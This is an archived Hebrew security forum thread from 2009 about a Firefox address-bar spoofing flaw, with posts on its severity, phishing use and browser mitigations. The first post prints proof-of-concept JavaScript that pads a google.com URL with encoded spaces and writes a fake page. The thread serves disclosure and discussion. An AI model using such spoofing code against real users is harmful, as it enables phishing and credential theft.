Logo

רד-בורד: ארכיון

ראשי > אבטחת מידע > Firefox URL Spoofing Vulnerability

28/07/2009 20:35:52 cp77fk4r
הכותרת המלאה היא:
Mozilla Firefox URL Processing Address Bar Spoofing Vulnerability

פשוט התווים בכותרת מעטים מדי.. :)


בחור נחמד מארגנטינה בשם Juan Pablo Lopez Yacubian מצא דרך לבצע URL SPOOFINF - הכוונה היא שאתה רואה בשורת הURL (שורת ה Address Bar) כתובת מסויימת, אך בתוכן של העמוד אתה רואה מידע שונה, הדבר מאפשר לבצע פישינג מתוחכם על משתמשי FIREFOX.

אופן המתקפה מתבצע כך שהתוקף שולח את המשתמש לעמדוד שמשתמש בפונקציה "window.open".

לפונקציה, התוקף מכניס את כתובת הURL שהוא רוצה שתופיע בAddress Bar ואחריה מספר רב של "%20" - רווח (כך שיעלם מטווח חלון ה- Address Bar, ולאחריו הוא מוסיף פסיק
לאחר מכן הוא מכניס לתוכן העמוד את מה שברצונו שהקורבן יראה.


קוד לדוגמא:

קוד:
<p>
<a href="jscriptspoof()">test!</a>
<p>


<script>
function spoof()
{

a = window.open("http://www.google.com%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20,")
a.document.write("<H1>FAKE PAGE<\h1>")
a.document.write("<title>test</title>")
a.stop ();
}


משתמשי מוזילה שילחצו על קישור המכיל את הקוד הנ"ל יראו בשורת הכתובת שהם נמצאים בגוגל, אך תוכנו של העמוד יהיה "FAKE PAGE".

עמוד PoC שJuan Pablo Lopez Yacubian הכין:
http://es.geocities.com/jplopezy/firefoxspoofing.html


לפרסום בVUPEN:
http://www.vupen.com/english/advisories/2009/2006

עריכה:
אחרי הפרסום של הקוד אני רואה שחלק מהקוד נהרס בגלל כמה הגנות ששחף עשה במערכת, בשביל לראות את הקוד המלא פשוט מאוד תכנסו לעמוד שהבחור הכין ותראו את ה- Source.[ההודעה נערכה על-ידי cp77fk4r ב-28/07/2009 20:58:25]
28/07/2009 20:53:29 cp77fk4r
אגב, מי שישר קפץ ואמר לעצמו Cross Domain שיחזור לשבת, הגולש לא באמת נמצא בעמוד המדובר, ולכן אין כאן שום Cross Domain, כך ש Document.cookie לא באמת מתאכלס במידע שמגיע מהכתובת של האתר האמיתי.

אבל מה שכן אפשר לבצע זה פישינג ע"י הקמת מראה להעמוד שאליו בוצע ה- Spoofing וכך ל"דוג" את הקורבן.
28/07/2009 21:07:00 Setsuko
נחמד מאוד, למרות שזה Vuln חלש זה די מעניין לראות את זה קורה ב- Live, שווה לנסות עצמאית! :)
28/07/2009 23:02:53 cp77fk4r
בכלליות פישינג לא מוגדר כאיום קריטי מפני שיש כאן צורך באינטרקטיביות עם הקורבן (שלא כמו במתקפות SQLI לדוגמא)

אבל אל תזלזלי בפישינג, הייתי עד למספר מתקפות פישינג מאוד מתוחכמות, שאפילו אנשים מנוסים וחשדנים ביותר היו נופלים בהן.
אם בונים את המתקפה נכון אפשר להגיע לתוצאות מעניינות ביותר.
28/07/2009 23:26:11 Setsuko
כאן הפישינג יותר פשוט, וגם די קל לעלות עליו...
בשורת הכתובת גם אפשר לשים לב שזה עניין של תצוגה בכלל, אם עושים End עליה מקבלים את הפסיק בסוף... :P
אני חושבת שהפתרון הכי טוב יהיה להגדיר ב- Firefox שלשורת הכתובת יהיה רקע, וכך גם עשיתי, ועכשיו אני יכולה לראות את הרווחים ולכן לדעת שהכתובת מזוייפת. :)
28/07/2009 23:47:18 cp77fk4r
כן, פתרון יפה, מה גם שזה פתרון שיושם בכמעט כל הדפדפנים- בגרסאות החדשות שלהם, אני לא אוכל להעיד על Safari כי לא יצא לי להשתמש בו, אבל גם החבר’ה ממוזילה וגם החבר’ה מגוגל וגם החבר’ה ממיקרוסופט יישמו את הרעיון בצורה מאוד יפה, אם זה להדגיש את הדומיין, ואם זה להדגיש את סוג החיבור.
עמודים: 1